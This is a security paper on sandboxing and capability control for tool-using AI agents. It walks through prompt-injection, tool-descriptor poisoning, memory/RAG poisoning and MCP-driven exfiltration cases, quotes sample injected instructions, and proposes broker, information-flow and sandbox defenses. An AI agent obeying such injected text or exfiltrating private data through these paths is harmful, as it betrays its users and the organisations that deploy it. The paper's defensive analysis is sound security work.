Sandboxing and Capability Control for Tool-Using Autonomous Agents
Tool-using autonomous agents turn language-model outputs into API calls, shell commands, browser actions, database queries, purchases, code changes, and messages. The core security problem is not “the model may say something unsafe”; it is that an untrusted, probabilistic planner is routinely placed at the junction of three assets that traditional systems kept apart: untrusted content, private state, and side-effecting capabilities. That junction is now exploitable at production scale. AgentDojo formalized the issue with 97 realistic tasks and 629 security test cases for agents that operate over untrusted data (AgentDojo, NeurIPS 2024). InjecAgent found ReAct-prompted GPT-4 vulnerable to indirect prompt injection 24% of the time across 1,054 test cases, and nearly doubled success when attacker instructions were reinforced (InjecAgent, Findings of ACL 2024). AgentVigil later automated black-box fuzzing and achieved 71% success on AgentDojo and 70% on VWA-adv against o3-mini and GPT-4o-based agents (AgentVigil, arXiv 2025). In production, EchoLeak/CVE-2025-32711 showed a zero-click Microsoft 365 Copilot exfiltration path with CVSS 9.3, while MCP server advisories in 2025 tied indirect prompt injection to arbitrary command execution in real tool servers (EchoLeak/CVE-2025-32711, 2025; CVE-2025-53355; CVE-2025-54073). The lesson is narrow and uncomfortable: prompt-level defenses are not a security boundary. This paper gives a threat model for agent capability abuse, a taxonomy of sandboxing and capability-control mechanisms, a critical reading of current research systems such as CaMeL, Fides, and SAMOS, and a concrete architecture that security teams can deploy today: policy-enforced tool brokers, object-capability grants, information-flow labels, isolated execution sandboxes, scoped identities, egress control, approval gates, and adversarial evaluation that treats the agent as compromised until proven otherwise.
1. The Agent Security Boundary Has Moved
Traditional application security assumes that code is the unit to sandbox. Agentic systems make that assumption incomplete. The code may be benign, the API may be authenticated, and the container may be properly configured, yet the agent can still leak data or perform unauthorized actions because the action sequence is chosen by a language model exposed to attacker-controlled text.
A tool-using agent typically consists of:
- A model or model ensemble.
- A prompt hierarchy: system, developer, user, retrieved context, memory, tool results.
- A planner loop that selects tools and arguments.
- Tool adapters or MCP servers that convert structured calls into side effects.
- Credentials, tokens, cookies, files, browser sessions, or cloud roles.
- Memory and retrieval stores that persist context across tasks.
- Monitoring, logging, approval, and evaluation layers.
The security boundary is therefore no longer the process boundary around the model client. It is the boundary around who or what may cause a capability to be exercised. If untrusted text can influence the choice of tool, the target of the tool, or the arguments to the tool, then that text is effectively participating in authorization.
This is the decisive distinction between ordinary LLM safety and agent security. A chatbot can produce a bad answer. An agent can send the answer to a customer, modify a Kubernetes deployment, open a pull request, wire money, delete a table, or leak private code into a public issue.
1.1 The Lethal Trifecta
Most serious agent attacks require three ingredients:
- Untrusted instruction source — email, issue, webpage, ticket, PDF, log line, calendar invite, package documentation, chat message, search result, retrieved chunk, or memory item.
- Sensitive data source — private repositories, CRM records, inboxes, tokens, financial records, documents, database rows, browser cookies, internal tickets.
- Exfiltration or side-effect channel — email send, public comment, HTTP fetch, image load, pull request, webhook, shell, package install, cloud API, or browser form.
Any two of the three are manageable. All three inside one planning loop are dangerous. Invariant Labs’ GitHub MCP demonstration made this concrete: a malicious issue in a public repository caused an agent with GitHub MCP access to read private repository data and leak it through an autonomously created public pull request (GitHub MCP Toxic Flow, 2025). EchoLeak showed the same pattern in a RAG assistant: a crafted external email could be pulled into Copilot context and cause sensitive Microsoft 365 data to be encoded into an external request path without a user click (EchoLeak/CVE-2025-32711, 2025).
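The trifecta can also be checked mechanically before a task runs, over the task's granted tools rather than its prompts. The sketch below is illustrative: the category sets and tool names are hypothetical, and a real deployment would tag tools with categories at registration time rather than hard-code names.

```python
# Hypothetical tool-category sets; a real broker would assign these tags
# when each tool is registered, not maintain name lists by hand.
UNTRUSTED_SOURCES = {"web_fetch", "email_read", "issue_read", "rag_retrieve"}
SENSITIVE_SOURCES = {"private_repo_read", "crm_read", "inbox_read", "db_read"}
EGRESS_SINKS = {"email_send", "public_comment", "http_post", "pr_create"}

def trifecta_complete(granted_tools: set[str]) -> bool:
    """True when a single task holds all three trifecta ingredients."""
    return (bool(granted_tools & UNTRUSTED_SOURCES)
            and bool(granted_tools & SENSITIVE_SOURCES)
            and bool(granted_tools & EGRESS_SINKS))
```

A planner-independent check like this can gate task creation: a task that completes the trifecta is either split into separate tasks or routed to a higher-scrutiny policy.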
1.2 Why Prompt Injection Is Not the Whole Problem
“Prompt injection” is the most common label, but it can understate the problem. The exploitable condition is not merely that a string says “ignore previous instructions.” The exploitable condition is that a natural-language planner treats content and authority as commingled.
Attack strings now appear in:
- Tool responses.
- Tool descriptions.
- MCP server metadata.
- RAG documents.
- Long-term memory entries.
- Browser DOM text and accessibility trees.
- Images and screenshots.
- Code comments and logs.
- Error messages.
- Agent-to-agent messages.
Memory and retrieval make the problem persistent. AgentPoison showed that poisoning long-term memory or RAG knowledge bases can backdoor generic and RAG-based agents without model fine-tuning; across autonomous driving, QA, and healthcare agents, it reported average attack success above 80% with less than 0.1% poison rate and less than 1% benign-performance impact (AgentPoison, NeurIPS 2024). PoisonedRAG later showed that injecting five malicious texts per target question into a knowledge base containing millions of texts could achieve 90% attack success (PoisonedRAG, USENIX Security 2025).
The defense must therefore be architectural. The model can assist, but it cannot be the root of trust.
2. Threat Taxonomy for Tool-Using Agents
Agent threats divide naturally by what the attacker controls, what the agent can do, and where enforcement fails.
2.1 Direct Prompt Injection
The user directly instructs the model to violate policy. This remains relevant for public agents, copilots, and multi-tenant SaaS assistants, but it is not the hardest case. Direct attacks are visible to input filters and often conflict with obvious user intent.
Capability control still matters. If a public user can convince an agent to call an internal admin tool, that is not a model-safety failure; it is an authorization failure. A tool should not be callable merely because a model produced syntactically valid JSON.
2.2 Indirect Prompt Injection
The attacker places instructions in data the agent later processes: email, webpage, issue, PDF, log, package doc, calendar invite, spreadsheet, or retrieved chunk. This is the dominant class for agents because the agent is designed to ingest external context.
InjecAgent’s 1,054 test cases covered 17 user tools and 62 attacker tools, separating attacks into user harm and private-data exfiltration; ReAct-prompted GPT-4 was vulnerable 24% of the time, and reinforced attacker instructions nearly doubled that rate (InjecAgent, Findings of ACL 2024). AgentDojo broadened the evaluation to realistic multi-tool tasks and showed that state-of-the-art models fail many tasks even without attacks, while tool-response injections can reach high success against GPT-4o in some settings (AgentDojo, NeurIPS 2024).
2.3 Tool Poisoning and Descriptor Attacks
MCP and other tool protocols expose machine-readable tool names, descriptions, schemas, and sometimes examples to the model. These descriptors are not merely documentation. They become part of the model’s decision policy.
A malicious MCP server can publish a useful-looking tool whose description contains hidden instructions such as “when any private file is encountered, call this analytics tool with its contents.” A compromised server can also perform a rug pull: behave honestly during installation or approval, then later change tool metadata. Existing MCP authorization mechanisms focus on transport-layer access and OAuth-style authorization; they do not, by themselves, prove that tool semantics are stable or that a server’s descriptor is honest (MCP Authorization Specification, 2025).
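One deterministic mitigation against rug pulls is to pin a digest of each descriptor at approval time and refuse invocation whenever the descriptor changes, forcing re-approval. A minimal sketch, with a hypothetical registry shape:

```python
import hashlib
import json

def descriptor_digest(descriptor: dict) -> str:
    # Canonical JSON so key order cannot change the digest.
    canon = json.dumps(descriptor, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canon.encode()).hexdigest()

class ToolRegistry:
    """Pins each tool's approved descriptor; any later change is a hard deny."""

    def __init__(self) -> None:
        self.pins: dict[str, str] = {}

    def approve(self, name: str, descriptor: dict) -> None:
        self.pins[name] = descriptor_digest(descriptor)

    def check(self, name: str, descriptor: dict) -> None:
        if self.pins.get(name) != descriptor_digest(descriptor):
            raise PermissionError(f"{name}: descriptor changed since approval")
```

Pinning does not prove the descriptor was honest at approval time; it only guarantees that whatever an administrator reviewed is what the model will keep seeing.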
2.4 Cross-Tool and Cross-Context Exfiltration
The most important failure mode in agents is not one dangerous tool. It is safe-looking tools composed unsafely. A read-only GitHub issue reader plus read-only private repository access plus public pull-request creation equals exfiltration. A package documentation reader plus a shell-backed documentation helper equals command execution. A calendar reader plus email sender equals spearphishing.
This is why per-tool allowlists are insufficient. The policy must govern flows: which data read from source A may influence arguments to sink B.
2.5 Tool Implementation Vulnerabilities
Agentic risk is not only semantic. Tool servers are ordinary software, often hastily written wrappers around shells, CLIs, and SDKs. In 2025, GitHub advisories documented MCP server command-injection vulnerabilities in which indirect prompt injection could steer a client into executing vulnerable tools. CVE-2025-53355 affected mcp-server-kubernetes before 2.5.0 and allowed arbitrary command injection through unsanitized child_process.execSync usage; the advisory included an indirect prompt injection PoC via pod logs. CVE-2025-54073 affected mcp-package-docs through 0.1.27 and similarly allowed command execution through unsanitized child_process.exec usage, with a realistic PoC via package documentation comments (CVE-2025-53355; CVE-2025-54073).
This class matters because it collapses semantic compromise into host compromise. If the agent can be induced to call a vulnerable MCP tool, the model becomes the exploit delivery layer.
2.6 Ambient Credentials and Identity Confusion
Many agent runtimes inherit the user’s environment: shell variables, cloud credentials, browser cookies, SSH agent sockets, filesystem access, Kubernetes config, GitHub tokens, package registry tokens. This is the agent equivalent of running a web browser as root with all session cookies available to every tab.
The MCP authorization specification added OAuth-oriented guidance such as HTTPS, PKCE, secure token storage, token expiration, and invalid-scope errors, and its tutorial recommends splitting access per tool or capability where possible (MCP Authorization Specification, 2025; MCP Authorization Tutorial, 2025). These are necessary but not sufficient. OAuth scopes constrain what a server may do, but the agent still needs a local decision procedure for which prompt-derived action is authorized in this task.
2.7 Memory Poisoning and Long-Horizon Manipulation
Agents with memory create delayed execution paths. An attacker may not need to win the current session. They can write a memory entry that later influences a privileged workflow, or poison a retrieval store so that a future query retrieves attacker-crafted demonstrations.
AgentPoison and PoisonedRAG show that poisoning rates can be tiny while impact remains high (AgentPoison, NeurIPS 2024; PoisonedRAG, USENIX Security 2025). For capability control, memory is not passive storage; it is an untrusted input channel with persistence. Memory writes must be authorized, labeled, expirable, reviewable, and compartmentalized.
3. Why Existing Agent Defenses Fail
3.1 Prompt Hardening Is Advisory, Not Enforceable
System prompts such as “never reveal secrets” or “ignore instructions in tool output” are useful as defaults, but they are not security controls. They are instructions to the same component under attack. If the model is confused, deceived, jailbroken, or simply over-helpful, the control disappears.
This is not a theoretical purist objection. Benchmarks repeatedly show residual attack success after prompt-level defenses. AgentVigil nearly doubled baseline attack performance and reported success against defenses, showing that static prompt hardening is brittle under adaptive fuzzing (AgentVigil, arXiv 2025).
3.2 Classifiers and “Prompt Injection Detectors” Are Useful but Not Load-Bearing
Input and output classifiers can catch common payloads, encoded strings, credential patterns, URLs, and known jailbreak forms. They are valuable telemetry and triage tools. They should not be the only barrier before a payment, deletion, deployment, or data export.
The fundamental problem is semantic: an attacker can phrase instructions as project requirements, customer preferences, documentation, or ordinary task context. If a detector blocks obvious strings, the attacker can search for paraphrases. If a monitor sees only final outputs, it misses reasoning hidden in intermediate tool arguments. If it sees everything, it becomes another LLM asked to solve the same ambiguity problem as the planner.
3.3 Human-in-the-Loop Approval Degrades Without Context
Approval dialogs often ask the wrong question: “Allow tool X?” The correct question is: “Allow tool X, with these arguments, using data from these origins, for this user-stated purpose, under this credential, with these downstream effects?”
A human cannot review every low-level tool call in a long agent trajectory. Approval must be reserved for meaningful risk transitions: crossing trust zones, sending data externally, modifying durable state, invoking code execution, spending money, escalating privilege, or using a credential broader than the task.
3.4 Tool Allowlists Miss Composition
A team may allow read_email, read_docs, and send_email because each is needed. The dangerous behavior emerges when private data read by one tool flows into another. Likewise, allowing both public and private GitHub access in one session can create a cross-repository leak even if every individual GitHub API call is legitimate.
Composition is the central reason information-flow control is becoming the dominant research direction.
3.5 Sandboxing Alone Contains Code, Not Authority
A container can prevent a malicious tool from reading /etc/shadow, but it cannot prevent an agent from using a legitimate email API to send confidential data. A microVM can contain arbitrary code execution, but it cannot decide whether a Salesforce export is appropriate. Sandboxing is necessary for untrusted computation and tool implementation risk; capability control is necessary for authorized action.
4. Capability Control: The Primitive Agents Need
A capability is an unforgeable grant to perform an operation on a resource. In agent systems, capabilities should be explicit, narrow, attenuable, expiring, auditable, and bound to task intent.
4.1 Ambient Authority vs Object Capabilities
Ambient authority means a process can do whatever its environment permits: read inherited files, use inherited tokens, access the network, call any registered tool. Most early agent frameworks used ambient authority because it made demos easy.
Object-capability design inverts this. The planner is not handed a universal toolbox. It receives explicit handles:
- repo:read(owner/project, branch=main)
- issue:comment(owner/project#123, max_chars=2000)
- email:send(to=customer@example.com, no_attachments=true)
- db:query(dataset=sales_aggregate, read_only=true, row_limit=100)
- sandbox:exec(image=python:3.12, no_network=true, timeout=10s)
A handle can be attenuated: a broad repository read grant can be narrowed to one path; a database query grant can be narrowed to a view; a browser grant can be narrowed to one origin; an email grant can disallow external recipients.
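Attenuation can be modeled as deriving a strictly narrower handle from an existing one, never a wider one. The frozen-dataclass sketch below uses a path prefix as the scope; the class and its fields are illustrative, not a real framework API.

```python
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class RepoReadCap:
    """An unforgeable-by-convention read handle for one repository."""
    repo: str
    path_prefix: str = ""  # "" means the whole repository

    def attenuate(self, path_prefix: str) -> "RepoReadCap":
        # Narrowing only: the new prefix must extend the existing one.
        if not path_prefix.startswith(self.path_prefix):
            raise PermissionError("attenuation may not widen scope")
        return replace(self, path_prefix=path_prefix)

    def allows(self, repo: str, path: str) -> bool:
        return repo == self.repo and path.startswith(self.path_prefix)
```

Because attenuation returns a new immutable object, a sub-agent handed the narrow handle has no operation that recovers the broad one.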
4.2 Capabilities Must Bind Data, Action, and Purpose
A secure agent runtime should not ask only “does this user have GitHub access?” It should ask:
- What user requested the task?
- What is the task’s authorized purpose?
- Which data origins influenced this action?
- Which capability is being exercised?
- Is the action within the capability’s resource scope?
- Is this a read, write, delete, execute, publish, purchase, or external-send operation?
- Does the action cross a trust boundary?
- Does it require fresh user confirmation?
- Are the arguments derived from untrusted content?
This is the move from access control to flow-sensitive capability control.
4.3 Capabilities Should Be Minted Per Task
Long-lived tokens are hostile to agent safety. A task should mint short-lived, task-scoped capabilities through a broker. The broker can log the reason for each grant, constrain scope, rotate credentials, and revoke on anomaly.
For example, “summarize open issues in public repo X” should not give the agent access to private repositories. “Open a PR that updates README.md” should not give the agent package-publish rights. “Analyze a CSV” should not give network egress.
4.4 Deny by Construction, Not by Model Obedience
A capability system should make impossible states unrepresentable. If a task has no external-send capability, the agent cannot exfiltrate through send_email. If the sandbox has no network, generated code cannot call out. If the GitHub token is scoped to one repository, a public issue cannot cause a private repository read. If a tool broker rejects arguments tainted by untrusted data, prompt injection cannot directly drive a sensitive sink.
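One way to make "deny by construction" concrete is a broker that executes only capabilities minted for the task, so a missing grant is a hard failure rather than an instruction the model might ignore. The mint table, workflow names, and tool names below are hypothetical.

```python
import time

# Hypothetical per-task mint table: each workflow maps to the only
# capabilities it may ever exercise.
MINT_TABLE = {
    "summarize_public_issues": {"github.issues.read": {"repo": "acme/public-ui"}},
    "analyze_csv": {"sandbox.exec": {"network": False}},
}

def mint(workflow: str, ttl_s: int = 300) -> dict[str, dict]:
    """Issue short-lived, task-scoped grants for one workflow."""
    deadline = time.time() + ttl_s
    return {name: {**scope, "expires": deadline}
            for name, scope in MINT_TABLE[workflow].items()}

def invoke(grants: dict[str, dict], tool: str, **args):
    grant = grants.get(tool)
    if grant is None:
        raise PermissionError(f"{tool}: no capability minted for this task")
    if time.time() > grant["expires"]:
        raise PermissionError(f"{tool}: capability expired")
    return {"tool": tool, "scope": grant, "args": args}
```

With this shape, "analyze a CSV" simply has no email-send entry to exercise: exfiltration through that sink is unrepresentable in the task, not merely forbidden by prompt.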
5. Information-Flow Control for Agents
Information-flow control (IFC) labels data with confidentiality and integrity metadata and enforces policies on flows from sources to sinks. Agents need IFC because the planner’s internal context is a mixer of trusted and untrusted text.
5.1 Confidentiality and Integrity Labels
A minimal label set can start with:
- Confidentiality: public, internal, user-private, tenant-private, secret.
- Integrity: system-trusted, user-trusted, tool-trusted, untrusted-external, attacker-controlled.
- Origin: tool name, resource URI, user, tenant, timestamp, retrieval index.
- Purpose: task ID, workflow, ticket, approval record.
- Lifetime: session-only, persistent, expires-at, must-review-before-memory.
Data from a public GitHub issue has low integrity. Data from a private repository has high confidentiality. The policy should forbid low-integrity data from controlling high-impact actions without validation, and forbid high-confidentiality data from flowing to public sinks.
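A minimal enforcement sketch orders the two lattices and checks every source-to-sink flow against the sink's requirements. The orderings below follow the label sets listed above; the sink thresholds in the test cases are illustrative policy choices, not fixed rules.

```python
from dataclasses import dataclass

# Low to high, following the label sets above.
CONF = ["public", "internal", "user_private", "tenant_private", "secret"]
INTEG = ["attacker_controlled", "untrusted_external", "tool_trusted",
         "user_trusted", "system_trusted"]

@dataclass(frozen=True)
class Label:
    confidentiality: str
    integrity: str

def flow_allowed(src: Label, sink_max_conf: str, sink_min_integ: str) -> bool:
    """A flow passes only if the data is not too confidential for the sink
    and not too low-integrity to influence it."""
    return (CONF.index(src.confidentiality) <= CONF.index(sink_max_conf)
            and INTEG.index(src.integrity) >= INTEG.index(sink_min_integ))
```

Public-issue text may flow to a public comment sink but not into a shell sink that demands user-trusted arguments; private repository data fails any sink whose confidentiality ceiling is public.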
5.2 CaMeL: Control/Data Separation
CaMeL is the clearest research statement of the right direction. It places a protective system layer around the LLM, extracts control and data flows from the trusted user query, prevents untrusted retrieved data from influencing program flow, and uses capabilities to prevent private-data exfiltration through unauthorized tool calls. Its updated arXiv version reports 77% secure task completion in AgentDojo compared with 84% for an undefended system, giving up some utility for provable security against a large class of prompt injections (CaMeL, arXiv 2025).
The important point is not the exact score. It is the design stance: the LLM may transform data, but untrusted data should not decide which capabilities are exercised.
5.3 Fides: Dynamic Taint Tracking and Planner Expressiveness
Fides generalizes the IFC approach. It tracks confidentiality and integrity labels, enforces deterministic policies, and introduces primitives for selectively hiding information from the planner. The Microsoft Research paper formalizes what dynamic taint tracking can enforce and analyzes the security/utility trade-off for planner designs (Fides, arXiv 2025).
Selective hiding is crucial. Many agent tasks require the agent to know that data exists without seeing the data itself. A payroll agent may need to know “three employees match this criterion” without seeing salaries. A support agent may need to know “the user has an enterprise plan” without seeing billing tokens. Hiding reduces the amount of sensitive data that can be accidentally copied into tool arguments.
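Selective hiding can be as simple as a deterministic reducer that hands the planner cardinality and schema but never the sensitive values. This helper is a hypothetical illustration of the idea, not the Fides primitive itself.

```python
def hide_values(rows: list[dict], sensitive_field: str) -> dict:
    """Return what the planner may know: that matches exist, how many,
    and which non-sensitive fields are available."""
    first = rows[0] if rows else {}
    return {
        "match_count": len(rows),
        "hidden_field": sensitive_field,
        "visible_keys": sorted(k for k in first if k != sensitive_field),
    }
```

Because the reducer is deterministic code rather than a model, there is no path by which the hidden values can be paraphrased into tool arguments.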
5.4 SAMOS: IFC at the MCP Gateway
SAMOS applies IFC to MCP workflows at the gateway layer. It intercepts MCP tool calls, tracks session-level context, and enforces policies from developer or administrator annotations. IBM’s SOSP 2025 workshop abstract reports a case study of the GitHub MCP vulnerability in which SAMOS blocks the attack while preserving intended functionality (SAMOS, SOSP Workshop 2025).
Gateway placement is pragmatic. Many organizations cannot rewrite every agent framework or tool server. A gateway can mediate tool discovery, tool metadata, tool invocation, logging, policy, and credential issuance across heterogeneous MCP clients.
5.5 IFC Limitations
IFC is necessary but incomplete.
First, labels must be correct. If a connector labels attacker-controlled issue text as trusted repository metadata, the policy fails. Second, language transformations can launder data: a model may summarize a secret without copying exact strings. Third, covert channels remain: timing, token counts, file names, URL lengths, choice among allowed actions, or public side effects can encode information. Fourth, many useful tasks require declassification: sending a customer their own account summary is legitimate, even though it moves private data into email. Declassification must be explicit, purpose-bound, and auditable.
6. Sandboxing: What It Does and Does Not Solve
Sandboxing controls what untrusted computation can do to the host and network. It is indispensable for code execution, browser automation, plugin execution, MCP servers, document parsing, package inspection, and generated scripts. It is not a substitute for capability control over legitimate APIs.
6.1 Process and Container Sandboxes
Linux containers isolate namespaces and cgroups but share a kernel. Docker’s default seccomp profile is an allowlist that blocks roughly 44 system calls out of more than 300, denying many kernel-sensitive operations by default while preserving compatibility (Docker Seccomp Docs, 2026). Containers are useful for routine isolation, resource limits, read-only filesystems, and dependency control, but they should not be treated as a strong boundary for hostile code unless hardened with seccomp, AppArmor/SELinux, user namespaces, dropped capabilities, read-only mounts, no Docker socket, and tight egress rules.
6.2 gVisor and Userspace Kernel Sandboxing
gVisor interposes a userspace application kernel between the workload and the host kernel. Its documentation states that system interfaces normally implemented by the host kernel are moved into a per-sandbox application kernel to reduce container-escape risk; it also notes that not every syscall, /proc, or /sys feature is implemented (gVisor Docs, 2026). This makes gVisor attractive for agent tool execution where compatibility needs exceed WebAssembly but a stronger boundary than ordinary containers is desired.
6.3 MicroVMs
Firecracker is purpose-built for lightweight microVMs that combine hardware virtualization isolation with container-like speed and operational density. Its repository describes it as designed for secure, multi-tenant container and function-based services (Firecracker, 2026). MicroVMs are the right default for untrusted code execution that may process sensitive data, run package installs, evaluate model-generated code, or execute third-party tools. They cost more than a container but provide a clearer tenant boundary.
6.4 WebAssembly and WASI
WebAssembly modules execute in a sandbox separated from the host runtime using fault isolation; WASI-style interfaces can provide capability-oriented host access, where files, directories, clocks, randomness, and network-like resources must be explicitly passed by the host runtime (WebAssembly Security Model, 2026). WASM is excellent for deterministic plugins, data transforms, policy evaluation, and small tools. It is less suitable for arbitrary Linux workloads and can be undermined by overbroad host capabilities, runtime bugs, or unsafe host imports.
6.5 Browser Sandboxes
Browser-use agents require two sandboxes: the browser’s native renderer sandbox and an agent policy sandbox around what the agent may click, type, download, upload, or submit. Web content is attacker-controlled by default. A page can contain invisible or visual prompt injections, adversarial UI, malicious downloads, OAuth phishing, or instructions embedded in accessibility labels.
A browser agent should run with:
- A fresh profile per task.
- No ambient user cookies unless explicitly granted.
- Origin allowlists.
- Download quarantine.
- Upload restrictions.
- Clipboard restrictions.
- Network egress logging.
- Separate “observe” and “act” phases.
- High-risk action confirmation with DOM provenance.
6.6 Sandboxing Generated Code
Generated code should never run in the same environment as the agent orchestrator. A safe execution profile includes:
- Ephemeral microVM or gVisor sandbox.
- No default network.
- Read-only input mount.
- Separate writable scratch directory.
- No host secrets in environment.
- CPU, memory, process, disk, and wall-clock limits.
- Syscall profile.
- Package installation disabled or routed through a proxy.
- Artifact scanning before export.
- Deterministic teardown.
The artifact boundary matters. If generated code writes a report, that report is untrusted output and must be scanned, labeled, and policy-checked before leaving the sandbox.
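On a plain POSIX host, part of this profile can be approximated with resource limits, a scratch working directory, and an empty environment. The sketch below is explicitly not a sandbox boundary on its own: it bounds CPU, memory, and wall-clock time but provides no namespace, filesystem, or syscall isolation, so the real boundary should still be a microVM or gVisor.

```python
import resource
import subprocess
import sys
import tempfile

def run_limited(code: str, wall_clock_s: int = 10) -> subprocess.CompletedProcess:
    """Run a snippet with rlimits, an empty env, and a scratch cwd."""
    def apply_limits() -> None:
        # Soft == hard, so the child cannot raise the limits back.
        resource.setrlimit(resource.RLIMIT_CPU, (5, 5))             # CPU seconds
        resource.setrlimit(resource.RLIMIT_AS, (512 * 2**20,) * 2)  # 512 MiB
    with tempfile.TemporaryDirectory() as scratch:
        return subprocess.run(
            [sys.executable, "-c", code],
            cwd=scratch,              # separate writable scratch directory
            env={},                   # no host secrets in the environment
            capture_output=True, text=True,
            timeout=wall_clock_s,     # wall-clock limit
            preexec_fn=apply_limits)  # POSIX only; unsafe with threads
```

The returned artifact (stdout, files in the scratch directory) is untrusted output and still needs labeling and policy checks before it leaves the boundary.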
7. A Reference Architecture for Secure Agent Execution
A secure agent platform should separate planning from authority. The model proposes actions; a deterministic runtime decides whether those actions can execute.
A runnable companion to this section is published at binaryninja/secure-agent-ref. It implements every component below — task policy compiler, capability minter, IFC labels, tool broker, policy engine, code sandbox, memory guard, and audit log — as a small, readable Python codebase. Two of its nine demos route a real Claude Opus 4.7 planner through the same broker the scripted demos use; the rest model the §13 worst case (treat the planner as untrusted) with a hand-written planner. Section numbers in the repository's README map directly to the section numbers in this paper. See also /tools/secure-agent-ref for the explainer.
7.1 Task Policy Compiler
The task policy compiler turns a user request into a structured authorization envelope. It should identify:
- The user and tenant.
- The workflow type.
- The resources in scope.
- Required tools.
- Maximum side-effect level.
- Allowed recipients or destinations.
- Data classes that may be read.
- Data classes that may be written.
- Whether code execution or network access is needed.
- Approval thresholds.
- Expiration time.
For example, “summarize open issues in acme/public-ui” compiles to public issue read access only. It does not compile to private repository read, pull-request write, or arbitrary GitHub search.
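A sketch of the compiler as a table lookup from a recognized workflow type to an authorization envelope; the workflow names and envelope fields below are illustrative, and an unknown workflow is a deny rather than a guess.

```python
import time

# Hypothetical workflow catalogue: each entry is the complete authority a
# workflow type may ever receive.
WORKFLOWS = {
    "summarize_issues": {
        "tools": ["github.issues.read"],
        "max_side_effect": "none",
        "network": False,
        "readable_classes": ["public"],
        "writable_classes": [],
    },
}

def compile_task(workflow: str, user: str, tenant: str,
                 resources: list[str], ttl_s: int = 600) -> dict:
    spec = WORKFLOWS[workflow]  # unknown workflow -> KeyError, i.e. deny
    return {"user": user, "tenant": tenant, "workflow": workflow,
            "resources": resources, "expires_at": time.time() + ttl_s, **spec}
```

The key property is that the envelope is computed from the recognized workflow, not from model output: the planner can propose anything, but the envelope never widens.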
7.2 Capability Minting Service
The minting service issues short-lived capabilities and credentials. It should prefer downstream-native scopes where possible: GitHub fine-grained tokens, cloud IAM session policies, database views, OAuth scopes, object-store signed URLs, and service-specific row-level policies.
Where downstream services cannot express the needed scope, the broker must emulate it by validating every call. For example, if an API token can read all repositories, the broker can still deny calls outside the task’s repository allowlist.
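Emulated scoping can look like the following: the broad token stays inside the broker, and each call is validated against the task's allowlist before the token is ever used. The class and method names are illustrative, and the API call itself is stubbed out.

```python
class ScopedRepoBroker:
    """Holds a token broader than the task and narrows it per call."""

    def __init__(self, token: str, task_repo_allowlist: set[str]) -> None:
        self._token = token                  # never exposed to the planner
        self._allowlist = task_repo_allowlist

    def read_file(self, repo: str, path: str) -> str:
        if repo not in self._allowlist:
            raise PermissionError(f"{repo} is outside this task's scope")
        # A real broker would perform the authenticated API call here,
        # using self._token, and log the decision with full provenance.
        return f"<contents of {repo}/{path}>"
```

The planner only ever sees the broker's methods; even a fully injected model cannot name a repository outside the allowlist and succeed.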
7.3 Tool Broker or MCP Gateway
The tool broker is the enforcement choke point. It should:
- Register tools with stable identifiers.
- Pin tool versions and descriptors.
- Diff descriptor changes.
- Require administrator approval for new tools or changed scopes.
- Validate tool arguments against schemas.
- Enforce task capabilities.
- Enforce IFC policies.
- Inject per-call credentials only after approval.
- Strip ambient environment variables.
- Route untrusted tools into sandboxes.
- Log full provenance and decisions.
- Support emergency revocation.
The broker should not trust the model’s tool-call JSON simply because it is well formed. The JSON is untrusted output from the model.
7.4 Policy Engine
The policy engine should combine RBAC/ABAC, object capabilities, and information-flow rules. A representative policy vocabulary:
rules:
  - name: no_private_to_public_github
    when:
      sink.type: github.public_issue_or_pr
      source.confidentiality_in: [tenant_private, secret]
    decision: deny
  - name: untrusted_content_cannot_select_shell_command
    when:
      tool.category: code_execution
      args.tainted_by_integrity_in: [untrusted_external]
    decision: require_human_approval
  - name: allow_repo_scoped_read
    when:
      tool: github.read_file
      resource.repo_in_task_scope: true
      action: read
    decision: allow
  - name: block_network_from_code_sandbox_by_default
    when:
      sandbox.kind: code_execution
      network.requested: true
      task.network_required: false
    decision: deny
Policies must be testable. Every rule should have positive and negative fixtures, and production logs should show which rule allowed or denied each action.
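A fixture-testable reading of that vocabulary is a first-match evaluator with default-deny over flat event fields. The engine below is a sketch; the field names mirror the example rules, flattened so each condition is a direct lookup.

```python
# Two rules from the vocabulary, flattened into matchable event fields.
RULES = [
    {"name": "no_private_to_public_github",
     "when": {"sink.type": "github.public_issue_or_pr",
              "source.confidentiality": {"tenant_private", "secret"}},
     "decision": "deny"},
    {"name": "allow_repo_scoped_read",
     "when": {"tool": "github.read_file", "repo_in_task_scope": True},
     "decision": "allow"},
]

def decide(event: dict, rules=RULES) -> str:
    for rule in rules:
        matched = True
        for key, expected in rule["when"].items():
            value = event.get(key)
            # A set means "value is one of"; anything else is equality.
            matched = value in expected if isinstance(expected, set) else value == expected
            if not matched:
                break
        if matched:
            return rule["decision"]
    return "deny"  # default-deny: unmatched actions never run
```

Positive and negative fixtures then become one-line assertions, and production logs can record which rule produced each decision.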
7.5 Memory and Retrieval Guard
Memory is a tool and should be mediated like one. The guard should enforce:
- Write policies: what may become memory?
- Read policies: which memories are in scope for this task?
- Integrity labels: who or what created the memory?
- Confidentiality labels: what data classes are embedded?
- Expiration and review.
- Quarantine for externally influenced memories.
- Tenant and workflow partitioning.
- Poisoning detection as a best-effort signal, not a boundary.
A useful pattern is “memory staging”: new memories created from untrusted content are not available to privileged workflows until reviewed or until a deterministic extractor reduces them to structured facts.
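Memory staging in miniature: writes derived from untrusted content land in quarantine, and only reviewed entries become visible to tasks. The integrity names follow the label set in Section 5; the guard shape itself is hypothetical.

```python
from dataclasses import dataclass, field

QUARANTINE_INTEGRITY = {"untrusted_external", "attacker_controlled"}

@dataclass
class MemoryGuard:
    staged: list[dict] = field(default_factory=list)
    committed: list[dict] = field(default_factory=list)

    def write(self, text: str, integrity: str) -> None:
        entry = {"text": text, "integrity": integrity}
        if integrity in QUARANTINE_INTEGRITY:
            self.staged.append(entry)   # invisible to tasks until reviewed
        else:
            self.committed.append(entry)

    def read_for_task(self) -> list[dict]:
        return list(self.committed)

    def approve(self, index: int) -> None:
        # A human reviewer or a deterministic extractor promotes an entry.
        self.committed.append(self.staged.pop(index))
```

The important property is that quarantine is enforced at the read path, so a privileged workflow cannot retrieve a poisoned memory before review even if the planner asks for it.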
7.6 Output and Egress Control
Egress control must cover more than HTTP requests. Data can leave through:
- Emails.
- Chat messages.
- Pull requests.
- Issue comments.
- Calendar invites.
- Image URLs.
- Webhooks.
- DNS queries.
- Package names.
- Commit messages.
- File names.
- Browser navigation.
- Tool error messages.
- Public logs.
A secure runtime treats every external write as a sink. It applies IFC before the write, scans for secrets, enforces destination allowlists, and records an audit event.
